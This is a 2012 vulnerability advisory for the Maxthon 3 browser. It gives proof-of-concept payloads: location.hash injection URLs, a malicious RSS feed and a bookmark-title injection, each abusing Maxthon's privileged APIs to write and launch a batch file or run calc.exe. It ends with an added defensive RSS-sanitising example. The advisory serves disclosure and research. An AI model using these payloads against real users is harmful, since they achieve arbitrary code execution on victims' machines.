Links:
http://seclists.org/fulldisclosure/2012/Dec/90
http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf

Test method:
--------------------------------------------------------------------------------
Warning: the following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users assume all risk!

Injection via the location.hash property:

```
http://x.x.x.x/maliciouspage.html#"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")">
```

Passing multiple arguments to the executable:

```
http://x.x.x.x/maliciouspage.html#"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")">
```

Maliciouspage.html source code:

```html
<body><script>a = window.location.href="about:history";</script></body>
```

Malicious RSS feed – arbitrary code execution:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0">
<channel>
<description>Malerisch.net</description>
<link>http://blog.malerisch.net/</link>
<title>Malerisch.net</title>
<item>
<title>test"><img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")";></title>
<link>javascript:alert(window.location);</link>
<description>07/09/2008 - test <img src=a onerror="var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")";></description>
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
</item>
</channel>
</rss>
```

Malicious Add to Favorite injection – HTML source code:

```html
<html>
<head>
<title>Google</title>
<script>
evilpayload="location.href="file:///C:/windows/system32/calc.exe";"
padding="Google - www.google.com"
padding2=" "
padding3=" - the best search engine - bookmark now!!!"
window.external.addFavorite("www.google.com",padding+""><scri"+"pt>"+evilpayload+"</"+"script>"+" "+" "+padding+padding3)
</script>
</head>
<body>
<h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code Execution PoC</h3>
<font size="+1">Roberto Suggi Liverani - <a href="http://blog.malerisch.net">http://blog.malerisch.net</a> - <a href="https://twitter.com/malerisch">@malerisch</a> - <a href="http://www.securityassessment.com">Security-Assessment.com</a></font>
<br>Steps:
<ul>
<li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in the middle of the screen. The injected payload can only be seen if the user scrolls on the left of the title element.
<li>User adds the bookmark.
<li>User then clicks on the Star (Favorites) icon or
<li>User clicks on the bookmark link from the bookmark toolbar.
<li>In both cases, calc.exe is executed.
</ul>
The code for the exploit:<br>
<code>
evilpayload="location.href="file:///C:/windows/system32/calc.exe";"
window.external.addFavorite("www.google.com","yourpaddinghere"><scri"+"pt>"+evilpayload+"</"+"script>andpaddinghere");
</code>
</body>
</html>
```

Copyright Security-Assessment.com www.security-assessment.com

Recommendations:
--------------------------------------------------------------------------------
Vendor patch: Maxthon
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.maxthon.com/
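Added example, not part of the advisory and not Maxthon's code: the malicious RSS feed above abuses two things a feed reader does when it renders items into a privileged page, interpreting `<title>`/`<description>` text as markup and following a `javascript:` `<link>`. A reader that escapes those fields as text and accepts only http(s) links removes both vectors; the function names and the sample item below are constructed for this example.

```javascript
// Added example (not from the advisory): defensive handling of RSS item
// fields by a feed reader that renders them into a privileged page.
// Two feed-controlled inputs are neutralised: HTML in title/description is
// escaped to text, and link schemes other than http(s) are rejected.
// The sample item at the bottom is constructed to mirror the advisory's feed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape every character that could open a tag or break out of an attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow only absolute http(s) links; javascript:, file:, data: etc. yield null.
function safeHref(link) {
  try {
    const url = new URL(String(link).trim());
    return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : null;
  } catch (e) {
    return null; // relative or unparsable links are not rendered as anchors
  }
}

// Flag items that carry markup or event-handler attributes in text fields,
// or a non-http(s) link, so the reader can log them for review.
function isSuspiciousItem(item) {
  const fields = [item.title, item.description].map((f) => String(f || ''));
  const hasMarkup = fields.some((f) => /<\s*[a-z!\/]/i.test(f) || /\bon[a-z]+\s*=/i.test(f));
  return hasMarkup || safeHref(item.link) === null;
}

// Build an item's HTML with every feed-controlled value escaped or validated.
function renderItem(item) {
  const title = escapeHtml(item.title);
  const href = safeHref(item.link);
  const heading = href ? `<a href="${escapeHtml(href)}">${title}</a>` : `<span>${title}</span>`;
  return `<li>${heading}<p>${escapeHtml(item.description)}</p></li>`;
}

// Constructed sample with the same shape as the advisory's malicious item
// (a harmless placeholder handler stands in for the original payload).
const sampleItem = {
  title: 'test"><img src=a onerror="alert(1)">',
  link: 'javascript:alert(window.location);',
  description: '07/09/2008 - test <img src=a onerror="alert(1)">',
};
```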